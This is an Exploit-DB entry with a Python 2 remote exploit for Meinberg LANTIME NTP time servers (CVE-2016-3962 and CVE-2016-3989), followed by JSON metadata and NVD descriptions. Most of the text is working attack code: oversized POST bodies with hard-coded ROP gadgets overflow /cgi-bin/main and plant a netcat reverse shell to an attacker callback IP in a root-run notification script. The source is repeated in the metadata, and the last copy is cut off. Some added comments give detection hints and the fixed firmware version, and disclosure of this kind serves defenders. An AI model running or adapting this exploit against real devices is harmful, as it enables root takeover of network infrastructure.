ID EDB-ID:40120
Type exploitdb
Reporter b0yd
Modified 2016-07-17T00:00:00
Description
Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges. CVE-2016-3962,CVE-2016-3989. Remote exploit for Hardware p...
#!/usr/bin/python
#
# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit
# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/
#
# 271 - trigger notifications
# 299 - copy user defined notifications
# Kernel Version: 2.6.15.1
# System Version: 530
# Lantime configuration utility 1.27
# ELX800/GPS M4x V5.30p
import socket
import struct
import telnetlib
import sys
import time
# NOTE(review): Python 2 source (print statements, integer division in
# `71/4`); it will not run unmodified under Python 3. `telnetlib` is imported
# above but never used, and `param` is assigned in every stage and never read.
#
# What the visible code does, for a defender reading this: four HTTP/1.1 POST
# requests to /cgi-bin/main on port 80, each carrying a `button=` form field of
# roughly 10 KB (9756 or 10028 filler bytes followed by packed native-endian
# 32-bit values and, in stages 1 and 4, a NUL-terminated shell command). This
# is the stack overflow tracked as CVE-2016-3962 on this page; the fixed
# addresses below tie it to one firmware build. Per the advisories quoted on
# this page the fix is firmware 6.20.004 or later. For detection, a POST to
# /cgi-bin/main whose Content-Length is in the ~10 KB range is far larger than
# any legitimate form submission and is a straightforward log/WAF indicator.
if len(sys.argv) < 3:
    print "[-] <Host> <Callback IP> "
    exit(1)
host = sys.argv[1]
callback_ip = sys.argv[2]
print "[+] exploiting Meinburg M400"
port = 80
###################################################################
#
# Copy user_defined_notification to /www/filetmp
# Append reverse shell string to /file/tmp
#
# Stage 1. The request body packs the `system` and `exit` addresses and a
# pointer (`some_str`) ahead of the NUL-terminated `command` string; per the
# advisory quoted on this page the CGI runs as the web server user 'nobody'.
# The command appends to a copy of /mnt/flash/config/user_defined_notification,
# presumably the root-executed script that CVE-2016-3989 ("'nobody' has
# permissions to alter script that can only run as 'root'") refers to - confirm
# against the advisory. The listener port 4444 is hard-coded in the command.
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
#must have a listener setup to receive the callback connection on ip 192.168.60.232
# i.e. nc -v -l -p 4444
command = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo "{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;" >> /www/filetmp'
msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
time.sleep(1)
###################################################################
#
# Copy /www/filetmp to user_defined_notification
#
# Stage 2. The body is a packed sequence of return addresses and gadgets (the
# per-line comments are the author's); `send_cmd`, `ret` and `stack_pivot` are
# fixed addresses in the target binary. Unlike stage 1 no command string is
# sent here.
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65
#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x80012111 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
# NOTE(review): `csock.close` without parentheses is an attribute lookup, not
# a call, so this socket is never closed explicitly (the other three stages
# call `close()`).
csock.close
time.sleep(1)
###################################################################
#
# Trigger reverse shell
#
# Stage 3. Identical to stage 2 except for the value packed at the
# `[eax + 0x60]` slot (0x800120f5 here, 0x80012111 above).
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
send_cmd = 0x807ED88
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
ret = 0x804CE65
#stack pivot
stack_pivot = 0x8049488
msg = "button=" + "A" * 9756
msg += "B" * 28
msg += struct.pack("I", 0x7FFEE01A ) # ebp
msg += struct.pack("I", 0x0804ce64 ) # pop eax ; ret
msg += struct.pack("I", some_str - 0x100 ) # some place
msg += struct.pack("I", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret
msg += struct.pack("I", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret
msg += struct.pack("I", ret ) * (71/4)
msg += struct.pack("I", send_cmd )
msg += struct.pack("I", exit )
msg += struct.pack("I", 0x800120f5 ) # [eax + 0x60]
msg += struct.pack("I", some_str ) # buffer
msg += struct.pack("I", 0xffffffff ) # count
msg += "E" * 120
msg += struct.pack("I", 0xB1E8B434 ) # ebx
msg += struct.pack("I", some_str - 100 ) # esi
msg += struct.pack("I", some_str - 100 ) # edi
msg += struct.pack("I", some_str - 0x100 ) # ebp
msg += struct.pack("I", stack_pivot ) # mov esp, ebp ; ret
msg += "A" * 100
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
time.sleep(1)
print "[+] cleaning up"
###################################################################
#
# Kill all mains that are hung-up
#
# Stage 4 (cleanup). Same body layout as stage 1 with `killall main` as the
# command. Forensically, `main` CGI processes dying around the time of the
# oversized POSTs is a second indicator to correlate with the web-server log.
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
param = "A" * 0x2850
resp = "POST /cgi-bin/main HTTP/1.1\r\n"
resp += "Host: " + host + "\r\n"
resp += "User-Agent: Mozilla/5.0\r\n"
resp += "Accept: text/html\r\n"
resp += "Accept-Language: en-US\r\n"
resp += "Connection: keep-alive\r\n"
resp += "Content-Type: application/x-www-form-urlencoded\r\n"
system = 0x80490B0
exit = 0x80492C0
some_str = 0x850BDB8
command = 'killall main'
msg = "button=" + "A"*10028
msg += struct.pack("I", system )
msg += struct.pack("I", exit )
msg += struct.pack("I", some_str )
msg += command + "\x00"
resp += "Content-Length: " + str(len(msg)) + "\r\n\r\n"
resp += msg
csock.send(resp)
csock.close()
print "[+] enjoy"
{"id": "EDB-ID:40120", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges", "description": "Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges. CVE-2016-3962,CVE-2016-3989. Remote exploit for Hardware p...", "published": "2016-07-17T00:00:00", "modified": "2016-07-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:NONE/", "score": 8.5}, "href": "https://www.exploit-db.com/exploits/40120/", "reporter": "b0yd", "references": [], "cvelist": ["CVE-2016-3989", "CVE-2016-3962"], "lastseen": "2016-07-18T19:13:40", "viewCount": 27, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-07-18T19:13:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-3962", "CVE-2016-3989"]}, {"type": "zdt", "idList": ["1337DAY-ID-25437"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106110"]}, {"type": "ics", "idList": ["ICSA-16-175-03"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D34BF86AC539AEBAEDB8B3FFCD3F9B4B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:137947"]}], "modified": "2016-07-18T19:13:40", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/40120/", "sourceData": "#!/usr/bin/python\r\n#\r\n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit\r\n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/\r\n#\r\n# 271 - trigger notifications\r\n# 299 - copy user defined notifications\r\n\r\n# Kernel Version: 2.6.15.1\r\n# System Version: 530 \r\n# Lantime configuration utility 1.27\r\n# ELX800/GPS M4x V5.30p\r\n\r\nimport socket\r\nimport struct\r\nimport telnetlib\r\nimport sys\r\nimport time\r\n\r\nif len(sys.argv) < 3:\r\n\tprint \"[-] <Host> <Callback IP> \"\r\n\texit(1)\r\n\r\n\t\r\nhost = 
sys.argv[1]\r\ncallback_ip = sys.argv[2]\r\n\r\nprint \"[+] exploiting Meinburg M400\"\r\nport = 80\r\n\r\n###################################################################\r\n#\r\n# Copy user_defined_notification to /www/filetmp\r\n# Append reverse shell string to /file/tmp\t\r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n\r\n#must have a listener setup to receive the callback connection on ip 192.168.60.232\r\n# i.e. nc -v -l -p 4444\r\ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp'\r\n\r\nmsg = \"button=\" + \"A\"*10028 \r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n\r\ntime.sleep(1)\r\n\r\n###################################################################\r\n#\r\n# Copy /www/filetmp to user_defined_notification\t\r\n# \r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: 
keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsend_cmd = 0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n\r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n\r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += struct.pack(\"I\", ret ) * (71/4)\r\n\r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" * 120\r\n\r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close\r\n\r\ntime.sleep(1)\r\n\r\n###################################################################\r\n#\r\n# Trigger reverse shell\t\r\n# \r\n\t\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsend_cmd = 
0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n\r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n\r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += struct.pack(\"I\", ret ) * (71/4)\r\n\r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x800120f5 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" * 120\r\n\r\nmsg += struct.pack(\"I\", 0xB1E8B434 ) # ebx\r\nmsg += struct.pack(\"I\", some_str - 100 ) # esi\r\nmsg += struct.pack(\"I\", some_str - 100 ) # edi\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # ebp\r\nmsg += struct.pack(\"I\", stack_pivot ) # mov esp, ebp ; ret\r\nmsg += \"A\" * 100\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n\r\ntime.sleep(1)\r\n\r\n\r\nprint \"[+] cleaning up\"\r\n###################################################################\r\n#\r\n# Kill all mains that are hung-up\r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n\r\nparam = \"A\" * 0x2850\r\n\r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n\r\ncommand = 'killall 
main'\r\n\r\nmsg = \"button=\" + \"A\"*10028 \r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n\r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n\r\nprint \"[+] enjoy\"", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T06:28:06", "description": "The NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote authenticated users to obtain root privileges for writing to unspecified scripts, and consequently obtain sensitive information or modify data, by leveraging access to the nobody account.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2016-07-03T14:59:00", "title": "CVE-2016-3989", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3989"], "modified": "2017-09-03T01:29:00", "cpe": ["cpe:/h:meinberg:lantime_m100:-", "cpe:/h:meinberg:lantime_m900:-", "cpe:/h:meinberg:lantime_m600:-", "cpe:/h:meinberg:syncfire_1100:-", "cpe:/h:meinberg:lantime_m200:-", "cpe:/h:meinberg:lantime_m300:-", "cpe:/o:meinberg:ntp_server_firmware:6.0", "cpe:/h:meinberg:ims-lantime_m1000:-", "cpe:/h:meinberg:lantime_m400:-", "cpe:/h:meinberg:lces:-", "cpe:/h:meinberg:ims-lantime_m500:-", 
"cpe:/h:meinberg:ims-lantime_m3000:-"], "id": "CVE-2016-3989", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3989", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:N"}, "cpe23": ["cpe:2.3:h:meinberg:lantime_m900:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:syncfire_1100:-:*:*:*:*:*:*:*", "cpe:2.3:o:meinberg:ntp_server_firmware:6.0:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m3000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m300:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m200:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m100:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m500:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m400:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m600:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m1000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lces:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-07-03T14:59:00", "title": "CVE-2016-3962", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3962"], "modified": "2017-09-03T01:29:00", "cpe": ["cpe:/h:meinberg:lantime_m100:-", "cpe:/h:meinberg:lantime_m900:-", "cpe:/h:meinberg:lantime_m600:-", "cpe:/h:meinberg:syncfire_1100:-", "cpe:/h:meinberg:lantime_m200:-", "cpe:/h:meinberg:lantime_m300:-", "cpe:/o:meinberg:ntp_server_firmware:6.0", "cpe:/h:meinberg:ims-lantime_m1000:-", "cpe:/h:meinberg:lantime_m400:-", "cpe:/h:meinberg:lces:-", "cpe:/h:meinberg:ims-lantime_m500:-", "cpe:/h:meinberg:ims-lantime_m3000:-"], "id": "CVE-2016-3962", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3962", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:h:meinberg:lantime_m900:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:syncfire_1100:-:*:*:*:*:*:*:*", "cpe:2.3:o:meinberg:ntp_server_firmware:6.0:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m3000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m300:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m200:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m100:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m500:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m400:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lantime_m600:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:ims-lantime_m1000:-:*:*:*:*:*:*:*", "cpe:2.3:h:meinberg:lces:-:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-04-08T14:26:17", "edition": 2, "description": "Exploit for hardware platform in category remote exploits", "published": "2016-07-17T00:00:00", "type": "zdt", "title": "Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges", "bulletinFamily": "exploit", "cvelist": 
["CVE-2016-3989", "CVE-2016-3962"], "modified": "2016-07-17T00:00:00", "id": "1337DAY-ID-25437", "href": "https://0day.today/exploit/description/25437", "sourceData": "#!/usr/bin/python\r\n#\r\n# EDB Note: Source ~ https://github.com/securifera/CVE-2016-3962-Exploit\r\n# EDB Note: More info ~ https://www.securifera.com/blog/2016/07/17/time-to-patch-rce-on-meinberg-ntp-time-server/\r\n#\r\n# 271 - trigger notifications\r\n# 299 - copy user defined notifications\r\n \r\n# Kernel Version: 2.6.15.1\r\n# System Version: 530 \r\n# Lantime configuration utility 1.27\r\n# ELX800/GPS M4x V5.30p\r\n \r\nimport socket\r\nimport struct\r\nimport telnetlib\r\nimport sys\r\nimport time\r\n \r\nif len(sys.argv) < 3:\r\n print \"[-] <Host> <Callback IP> \"\r\n exit(1)\r\n \r\n \r\nhost = sys.argv[1]\r\ncallback_ip = sys.argv[2]\r\n \r\nprint \"[+] exploiting Meinburg M400\"\r\nport = 80\r\n \r\n###################################################################\r\n#\r\n# Copy user_defined_notification to /www/filetmp\r\n# Append reverse shell string to /file/tmp \r\n#\r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\n \r\n#must have a listener setup to receive the callback connection on ip 192.168.60.232\r\n# i.e. 
nc -v -l -p 4444\r\ncommand = 'cp /mnt/flash/config/user_defined_notification /www/filetmp; echo \"{rm,/tmp/foo};{mkfifo,/tmp/foo};/bin/bash</tmp/foo|{nc,' + callback_ip +'0,4444}>/tmp/foo;\" >> /www/filetmp'\r\n \r\nmsg = \"button=\" + \"A\"*10028\r\nmsg += struct.pack(\"I\", system )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", some_str )\r\nmsg += command + \"\\x00\"\r\n \r\nresp += \"Content-Length: \" + str(len(msg)) + \"\\r\\n\\r\\n\"\r\nresp += msg\r\ncsock.send(resp)\r\ncsock.close()\r\n \r\ntime.sleep(1)\r\n \r\n###################################################################\r\n#\r\n# Copy /www/filetmp to user_defined_notification \r\n# \r\ncsock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)\r\ncsock.connect ( (host, int(port)) )\r\n \r\nparam = \"A\" * 0x2850\r\n \r\nresp = \"POST /cgi-bin/main HTTP/1.1\\r\\n\"\r\nresp += \"Host: \" + host + \"\\r\\n\"\r\nresp += \"User-Agent: Mozilla/5.0\\r\\n\"\r\nresp += \"Accept: text/html\\r\\n\"\r\nresp += \"Accept-Language: en-US\\r\\n\"\r\nresp += \"Connection: keep-alive\\r\\n\"\r\nresp += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n \r\nsend_cmd = 0x807ED88\r\nsystem = 0x80490B0\r\nexit = 0x80492C0\r\nsome_str = 0x850BDB8\r\nret = 0x804CE65\r\n \r\n#stack pivot\r\nstack_pivot = 0x8049488\r\nmsg = \"button=\" + \"A\" * 9756\r\n \r\nmsg += \"B\" * 28\r\nmsg += struct.pack(\"I\", 0x7FFEE01A ) # ebp\r\nmsg += struct.pack(\"I\", 0x0804ce64 ) # pop eax ; ret\r\nmsg += struct.pack(\"I\", some_str - 0x100 ) # some place\r\nmsg += struct.pack(\"I\", 0x080855cc ) # add dword ptr [eax + 0x60], ebp ; ret\r\nmsg += struct.pack(\"I\", 0x080651d4 ) # inc dword ptr [ebx + 0x566808ec] ; ret\r\nmsg += struct.pack(\"I\", ret ) * (71/4)\r\n \r\nmsg += struct.pack(\"I\", send_cmd )\r\nmsg += struct.pack(\"I\", exit )\r\nmsg += struct.pack(\"I\", 0x80012111 ) # [eax + 0x60]\r\nmsg += struct.pack(\"I\", some_str ) # buffer\r\nmsg += struct.pack(\"I\", 0xffffffff ) # count\r\nmsg += \"E\" 
